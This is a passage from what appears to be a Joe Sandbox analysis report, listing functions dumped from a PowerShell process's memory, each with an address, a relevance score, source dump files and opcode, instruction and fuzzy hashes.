            • Opcode ID: 0dfc5a91b971d9b4d0cf295b334876d04d73685344c5116d2cdf16629c3d85ee
            • Instruction ID: 20dda6a99cfad0a6df9355ee86c0bc73962007e235112272055949da759fb464
            • Opcode Fuzzy Hash: 0dfc5a91b971d9b4d0cf295b334876d04d73685344c5116d2cdf16629c3d85ee
            • Instruction Fuzzy Hash: B021043180E6C25FF31397341C16285BFA09F436A4F1802EAC494C74F3D9A9281AC7B2
            Function 00007FF9C575ED9C Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2055262538.00007FF9C5750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5750000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5750000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b74846947cbb72eab1ec11167227f12df53a7c311212a0c14fdf569ff80c6272
            • Instruction ID: cb89ce9b20e3b286b253b7ffecf087cc426a8d73a87ef130101789c8e24d4a0a
            • Opcode Fuzzy Hash: b74846947cbb72eab1ec11167227f12df53a7c311212a0c14fdf569ff80c6272
            • Instruction Fuzzy Hash: F811C834B1CA0A4BF254EA1DA44237533D1EF8AB11F6042B9D88ED7386CD28BC434BC5
            Function 00007FF9C5B7C3BA Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 348456506d8a376c3fec48c91b4443e4ec27991cd9091beb285875adb44c5e00
            • Instruction ID: cb26e98050e04ff08ecddb35bf27ef48ff2ae9111d2218b1801d8cd54c19b29e
            • Opcode Fuzzy Hash: 348456506d8a376c3fec48c91b4443e4ec27991cd9091beb285875adb44c5e00
            • Instruction Fuzzy Hash: 6A110870A0CB588FDB98DF48D8556ADBBF1FB99311F10056FE04DE3661DB71A8818B82
            Function 00007FF9C5B7C822 Relevance: .1, Instructions: 59COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3d55d327573c46861f10e2d8fd1ad11964588250a69fe3fd609b4a8bd967ea06
            • Instruction ID: 548ee5a9a58ac9ba7cb7efbfa3b35ee5f345d3ff0a17fe218496753e8e53a299
            • Opcode Fuzzy Hash: 3d55d327573c46861f10e2d8fd1ad11964588250a69fe3fd609b4a8bd967ea06
            • Instruction Fuzzy Hash: 6B01522161DB881FCB89DB2CA854A217BE1EFDA21571941DFE44CC72A3C915E805C752
            Function 00007FF9C5B7B8E5 Relevance: .1, Instructions: 57COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 954fe0db7c9c0078705c2d987ab54ba4bdc38b6cbacb959dab4a6ba378572b72
            • Instruction ID: c9fd0b8a4108539eaae201e771302890c8efdab1cba48952cdde77c593a17e3c
            • Opcode Fuzzy Hash: 954fe0db7c9c0078705c2d987ab54ba4bdc38b6cbacb959dab4a6ba378572b72
            • Instruction Fuzzy Hash: 4B01F71564DACB0ED753972818302A67FA0EE83161B0801F7E0A8C6093EC482919C792
            Function 00007FF9C5B773AB Relevance: .0, Instructions: 12COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ca7bc3aea2dbd283627057526afc12818f6ffec5b334cb28df596efe06a44c98
            • Instruction ID: 1d0e4630e9600d08be13b1fa643244f1dfa13f978d6d60a77e01f2a0a764720f
            • Opcode Fuzzy Hash: ca7bc3aea2dbd283627057526afc12818f6ffec5b334cb28df596efe06a44c98
            • Instruction Fuzzy Hash: 05C08C22C0F58709FF25A13A089A1502E818B87924BCA90FAC40887096ECEEA8034701
            Function 00007FF9C5B756A3 Relevance: .0, Instructions: 11COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1f75d3712ce808ae6d537a9e7d52228076742ed9b8e112294858d8b9de76f677
            • Instruction ID: 57ee3b8b4b142a527d8e3a141cfd6568188d20b4594548a3d33695150cd7672f
            • Opcode Fuzzy Hash: 1f75d3712ce808ae6d537a9e7d52228076742ed9b8e112294858d8b9de76f677
            • Instruction Fuzzy Hash: E8C09B15D6941702AD1CF972089617664129745900FD594B5DC05C00D9DD9EE5961551

            Non-executed Functions

            Function 00007FF9C5B711B4 Relevance: 8.8, Strings: 6, Instructions: 1340COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$6"$6"$6"$6"$6"
            • API String ID: 0-3140776990
            • Opcode ID: 4b95386da1b78af5068ceff2ad7e051a85bb87c2e10e20d422b204f8c1a8cc96
            • Instruction ID: c82be0066817139920248f116ea98dbb1f1a57b455ed19b2c693e499cbede61d
            • Opcode Fuzzy Hash: 4b95386da1b78af5068ceff2ad7e051a85bb87c2e10e20d422b204f8c1a8cc96
            • Instruction Fuzzy Hash: 5492F630B08A4A4FEB94EF2C98657B57BE1FF99700F4401BAD44DC72A2DE64EC018B91
            Function 00007FF9C58BB66C Relevance: 8.2, Strings: 5, Instructions: 1920COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$6"$Sl$Sl$sE
            • API String ID: 0-3503539951
            • Opcode ID: 292992cf6d8f77cfe672af58fb04c10459b2aa81f49b2f3a0b38a5db34ce8792
            • Instruction ID: 0edd061f65fcc4c57528bba2122a94b647062d0ee9c7360465302899ea7dd29f
            • Opcode Fuzzy Hash: 292992cf6d8f77cfe672af58fb04c10459b2aa81f49b2f3a0b38a5db34ce8792
            • Instruction Fuzzy Hash: 4AC2F121A1CA4B0FE7A8EF28584577977D1EF99B10F44417ED44EC32D7DE68B8428B82
            Function 00007FF9C550E710 Relevance: 5.7, Strings: 4, Instructions: 680COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$6"$6"$6"
            • API String ID: 0-3920047490
            • Opcode ID: ae5b1abb6dd589b4a30e984f90c1bb15529e7fe531f22bfcaa762bded8cea294
            • Instruction ID: b87d1cd911826169e2bfd069d730f4050836dd6fdea60386f1bd9d92a79aaf77
            • Opcode Fuzzy Hash: ae5b1abb6dd589b4a30e984f90c1bb15529e7fe531f22bfcaa762bded8cea294
            • Instruction Fuzzy Hash: FE12E532B0CA8A4FEBA4EF2894553757BD1FFDA700F5441BAD44DC3292DE69B8428B41
            Function 00007FF9C5B73455 Relevance: 4.2, Strings: 3, Instructions: 479COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$6"$6"
            • API String ID: 0-583208020
            • Opcode ID: c3fe13db778059fa77e08f34d45a2b5e2272bd41812b20d2719f93466b67376c
            • Instruction ID: a8b28223a65126ce067dbd1fde5ca56d6df6d52f0974b29075bfd9da74e61362
            • Opcode Fuzzy Hash: c3fe13db778059fa77e08f34d45a2b5e2272bd41812b20d2719f93466b67376c
            • Instruction Fuzzy Hash: 4FD1D36171C94A4FEB94EF2C9869BB57BD1EF5A750F0400BAE44DC72A3DE24AC418B81
            Function 00007FF9C58B8270 Relevance: 3.8, Strings: 2, Instructions: 1269COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$'_H
            • API String ID: 0-3728610162
            • Opcode ID: f7bacb3001890941aa90d57d85b31c9306b1458080139c3d220004d370200dc0
            • Instruction ID: e479fabf73062b3baf162763ab4a5941284860b3ef2d974493190e958caf2d60
            • Opcode Fuzzy Hash: f7bacb3001890941aa90d57d85b31c9306b1458080139c3d220004d370200dc0
            • Instruction Fuzzy Hash: 9182D021A1CA4A4FEBA8EF2C485577977D2FB99B00F54417EE04EC32D7DE64B8418B81
            Function 00007FF9C58B1A55 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$x~{!
            • API String ID: 0-1230893045
            • Opcode ID: 6e4a75622cc108c5c12e6bd9d4c401071871320911c4e3b02fce6b0a59ee8629
            • Instruction ID: a943a016280e7d0f38c132d9a877feaa307566f8ebdaa6d3eb6f4c3a03af5701
            • Opcode Fuzzy Hash: 6e4a75622cc108c5c12e6bd9d4c401071871320911c4e3b02fce6b0a59ee8629
            • Instruction Fuzzy Hash: 42D11870A08E8A4FEB48EF2898596B97BE1FF99301F5441BDD04EDB2D6CE74A841C740
            Function 00007FF9C58B1A70 Relevance: 2.9, Strings: 2, Instructions: 388COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$x~{!
            • API String ID: 0-1230893045
            • Opcode ID: db4ae84169db987f90ecae3f65d09dc65a90e5050710356c87c6d60939c124ac
            • Instruction ID: 8f4c3125536efdee03cef3eba5b977ac00ff392cf15f585108da316ad9fc860d
            • Opcode Fuzzy Hash: db4ae84169db987f90ecae3f65d09dc65a90e5050710356c87c6d60939c124ac
            • Instruction Fuzzy Hash: FDC12770E08E8A4FEB48EF2898596B97BE1FF99701F5441BDD04EDB2D6CE74A8418740
            Function 00007FF9C550E038 Relevance: 2.0, Strings: 1, Instructions: 797COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: /"
            • API String ID: 0-3359577793
            • Opcode ID: 455d2bb68a2f2c8ad5973f461f2b41368a84bd716a15746bb6158d3a72043cb5
            • Instruction ID: 280313abd8958dc2dc7a17af328ac7a0d983a0b45a58397251460d38a7ab0dd3
            • Opcode Fuzzy Hash: 455d2bb68a2f2c8ad5973f461f2b41368a84bd716a15746bb6158d3a72043cb5
            • Instruction Fuzzy Hash: 8A421925A0C7875FE714EB28A8923F63BD1EF46704F1481B9D48DC7293DE6AB8468781
            Function 00007FF9C5B81249 Relevance: 1.6, Strings: 1, Instructions: 349COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"
            • API String ID: 0-4197299889
            • Opcode ID: ffc5f004d1d46801861b31d7d01660c177281dd8a2c98b24537d936cd2e85939
            • Instruction ID: 430bb52a34ff406304111e6ba306abc3709837abd2545f62d4ea17c5a6835c64
            • Opcode Fuzzy Hash: ffc5f004d1d46801861b31d7d01660c177281dd8a2c98b24537d936cd2e85939
            • Instruction Fuzzy Hash: 57C11370A1DA8A8FE795EF7888553B97BE1FF4A305F1440BAE04DD7293CE686841CB41
            Function 00007FF9C54F2880 Relevance: .8, Instructions: 765COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 79abe44eea6129ba2499b07317d48c2f1fb596a776c5b7431557b4e47265375c
            • Instruction ID: f0b4f1721ad3395ce6a3fa1c6c59fe811b8f69e41c269a5c5df8d3bd73eed0ec
            • Opcode Fuzzy Hash: 79abe44eea6129ba2499b07317d48c2f1fb596a776c5b7431557b4e47265375c
            • Instruction Fuzzy Hash: 7D327570A28A4A8FD798EF38801536AB6D2FF8D705F50867DD04EC7396DE79B8418B40
            Function 00007FF9C54F967E Relevance: .5, Instructions: 524COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 68728bb3f596f7e8b0095aa95f1c54035742bddc2d32c0c3ef5f230f32ec3804
            • Instruction ID: fd1dca87ef8b846ba85ebcdf8f11ec2e69ce9342b4216fc85370b298b0381b0d
            • Opcode Fuzzy Hash: 68728bb3f596f7e8b0095aa95f1c54035742bddc2d32c0c3ef5f230f32ec3804
            • Instruction Fuzzy Hash: EF026270A286498FD759EF38901536AB7D2FF8D305F518ABDE08EC7366DA35E4028B01
            Function 00007FF9C51421DD Relevance: .4, Instructions: 421COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2029430950.00007FF9C5140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5140000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5140000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b7158c34332d1422d5ecf7112af10fb0299d7558cba5698ee7accc77842eb37a
            • Instruction ID: b20c7e04460a46c36302da936d46ae253d13bb8738757af729a3310452e0d6f8
            • Opcode Fuzzy Hash: b7158c34332d1422d5ecf7112af10fb0299d7558cba5698ee7accc77842eb37a
            • Instruction Fuzzy Hash: F7E17A30A18A4A9FDB98EF68D855BF977F1FF49704F1440B9D40DEB286CE69A8418B40
            Function 00007FF9C54F8438 Relevance: .4, Instructions: 419COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 97422c5d3cdb468614c14684ace003e259f1b0b012040e1cc45500b740c7c68a
            • Instruction ID: c34774007d9d26cd5018693c883bd1e1a53c083c36d0c5b7a9a41a5260457dcf
            • Opcode Fuzzy Hash: 97422c5d3cdb468614c14684ace003e259f1b0b012040e1cc45500b740c7c68a
            • Instruction Fuzzy Hash: D0D1B570A286458FD359EF38541626AB7D2FF8D305F1586BDE08DC72A7DE39E4028B41
            Function 00007FF9C54F9122 Relevance: .4, Instructions: 409COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c123ae49d1ded0c0f46300ef06b624d4412b6a5eb4977f2510f1ef80001436be
            • Instruction ID: 221ecb51d7efbcd4d3180759cc111bc3818a8e8d12ef92806ddb963a3bbc96ab
            • Opcode Fuzzy Hash: c123ae49d1ded0c0f46300ef06b624d4412b6a5eb4977f2510f1ef80001436be
            • Instruction Fuzzy Hash: 6DD1B470A28A458FD359EF38501636AB7D1FF8D705F6086BDE489C73A7DE39A4028B41
            Function 00007FF9C54F127F Relevance: .4, Instructions: 390COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fb14189de2191ce8a4f683334489632ba334fec408f72f6bbfcfaa03004bb59c
            • Instruction ID: 4b4d4f66b67203ba11f38153f993a0614e97ace59c55e34153ac2dbbf11e13d1
            • Opcode Fuzzy Hash: fb14189de2191ce8a4f683334489632ba334fec408f72f6bbfcfaa03004bb59c
            • Instruction Fuzzy Hash: D7C1C570A28A458FD358EF38905536AB7D1FF89305F5186BDE08EC7297CE79B8428B41
            Function 00007FF9C54F806D Relevance: .4, Instructions: 382COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: acfaa67a48aee426b54b758d3df1a555924669edd3807d3918172c05f970145e
            • Instruction ID: 152d842a8c65acee511b1b7add82b403753a0c866a1f28721512c45fa7db83ad
            • Opcode Fuzzy Hash: acfaa67a48aee426b54b758d3df1a555924669edd3807d3918172c05f970145e
            • Instruction Fuzzy Hash: 8DB1A431A286468FD759EF388415369B7D2EF8A315F5146BDD04EC72A3DE7AF8428B00
            Function 00007FF9C54F1CBD Relevance: .4, Instructions: 370COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 59411d784c0ce14570aef7cffe889acb02783db2823fc50016dd1ae5c981dfcf
            • Instruction ID: 1d8198b1ca4b5959d19aaf4d55bf8572f2da314bd29470e01f0dc7c637c180b9
            • Opcode Fuzzy Hash: 59411d784c0ce14570aef7cffe889acb02783db2823fc50016dd1ae5c981dfcf
            • Instruction Fuzzy Hash: CEB1B130A18A4A8FE798DF18C4957B6B7E1FF99310F44427EE44EC3292DF65B8418B41
            Function 00007FF9C54FECC5 Relevance: .3, Instructions: 349COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 12b343b8e851f4274a40462470381c43b04a6420d5c2f3f7cb21a84b5b1740c4
            • Instruction ID: 1380cec1aa97096861d54227b93912ada601b483d43e95ae53aba4fe205eeaa3
            • Opcode Fuzzy Hash: 12b343b8e851f4274a40462470381c43b04a6420d5c2f3f7cb21a84b5b1740c4
            • Instruction Fuzzy Hash: D2B18370A286458FD359EF38841536AB7D2FF8D705F5186BDE08EC7293DE79A8028B01
            Function 00007FF9C54F103E Relevance: .3, Instructions: 303COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 93b12ed3ec0e36a1c76046963dab7c7741b6cbee6666e5303bde7b2ec25565c3
            • Instruction ID: 016f7a35174aa89254ce2b1e2ecfe4afc0417cb207c5dca42683c4be0b9d4717
            • Opcode Fuzzy Hash: 93b12ed3ec0e36a1c76046963dab7c7741b6cbee6666e5303bde7b2ec25565c3
            • Instruction Fuzzy Hash: 8DA19630A2864A8FD759EF38845537AB2D2FF89705F5586BDD04EC7293DE79B8428B00
            Function 00007FF9C54F2592 Relevance: .3, Instructions: 285COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4750a661719fbbb23cd3d9ff868dc0334b4ac8d3e65919a5002faf3520c4e788
            • Instruction ID: 7fa0b7d44d86d4132dcb9e0a63658a18063849b27321057161108ec25008e954
            • Opcode Fuzzy Hash: 4750a661719fbbb23cd3d9ff868dc0334b4ac8d3e65919a5002faf3520c4e788
            • Instruction Fuzzy Hash: B7918571A286498FD398EF38545536AB6D2FF8D316F51867DE08EC7267DE39E4028B00
            Function 00007FF9C54FD659 Relevance: .3, Instructions: 263COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: efc6821343de912a074e61d4bc983dc7ba492d6c739161b2f78304d1db78116e
            • Instruction ID: 32f34c71bb093d767b1ff7e9872d7c043e157e7f6ce92c4cd48b82fe85b04a75
            • Opcode Fuzzy Hash: efc6821343de912a074e61d4bc983dc7ba492d6c739161b2f78304d1db78116e
            • Instruction Fuzzy Hash: 1C81A430A286468FD358EF388415369B7D2EF8D705F5186BDE04EC72A7CE79B8428B41
            Function 00007FF9C54FA4B9 Relevance: .3, Instructions: 255COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d1df2c3640df6363e8ee1fd20c8f5ca7cd347c50fe3f3d72309ce5c7a7a9fcba
            • Instruction ID: 810eac6ce692ef644f53001f6e85534f90c93ecbeda35924eb0520848c3c50d9
            • Opcode Fuzzy Hash: d1df2c3640df6363e8ee1fd20c8f5ca7cd347c50fe3f3d72309ce5c7a7a9fcba
            • Instruction Fuzzy Hash: 95711531A2D64A8FD359EF3898562757BD1EF8A211B0546FED04EC72A3DE79B802C700
            Function 00007FF9C550A48D Relevance: .3, Instructions: 251COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6264c75dac048363d78e55ce65c6a70ec392487f7d466f3710919ddaf8fa3c96
            • Instruction ID: 596c900c1dd6eec47a0c707670d07d16189b1fa7e7fbfc2e334f58ab9e5d5df1
            • Opcode Fuzzy Hash: 6264c75dac048363d78e55ce65c6a70ec392487f7d466f3710919ddaf8fa3c96
            • Instruction Fuzzy Hash: A1819330719A498FD759DF3CA0153A97BD1EF8E714F5847BEE099C72A3CA35A8428B04
            Function 00007FF9C54FD887 Relevance: .2, Instructions: 243COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7add980087499d4dae4a04473179a27bb1999571e79a3e24ea2085b32ec3a834
            • Instruction ID: e7e0628d63f127f0e82dcb1cd26f3b8e2c71979aee072c0479e9ee9051fe0574
            • Opcode Fuzzy Hash: 7add980087499d4dae4a04473179a27bb1999571e79a3e24ea2085b32ec3a834
            • Instruction Fuzzy Hash: DC719470B28A498FD799EF38401536AB6D1EF8D705F5086BDE08DC73A7DE79A4028B01
            Function 00007FF9C5500145 Relevance: .2, Instructions: 242COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 847fe042831f0b1c6b5d322fe8868dd7620bfdeccb4f12383a86ee1b59d01370
            • Instruction ID: c6bf3ef9a73156debc8d72a21c863dc48423a5a053c2dcd6808fc0d477a5791b
            • Opcode Fuzzy Hash: 847fe042831f0b1c6b5d322fe8868dd7620bfdeccb4f12383a86ee1b59d01370
            • Instruction Fuzzy Hash: 0C71FD31A2C68A8FD758DF389855269B7E2FF8A701B5545BED04EC3293DE35B802CB41
            Function 00007FF9C54FEFF4 Relevance: .2, Instructions: 234COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1839d715992ea4561743331e65e45e721c2ca3eaf5d38435dcdd54a8a164ae63
            • Instruction ID: 9c15acb6d4a26ced507a0f59086712417c2ad0590d4f8f7f0be056fdad028334
            • Opcode Fuzzy Hash: 1839d715992ea4561743331e65e45e721c2ca3eaf5d38435dcdd54a8a164ae63
            • Instruction Fuzzy Hash: C971B470A2D6458FD759EF38401536AB7D1FF89705F5186BEE08EC72A3DE79A4028B01
            Function 00007FF9C550A7ED Relevance: .2, Instructions: 221COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f6fc0bf6e12023f099c7fa13f34bf2df43d349b1699387773332ebf3553a30a2
            • Instruction ID: 960538111f6eeacc548f6021d39c0c16c450b3c767adcd79bf2598b2d3c46b18
            • Opcode Fuzzy Hash: f6fc0bf6e12023f099c7fa13f34bf2df43d349b1699387773332ebf3553a30a2
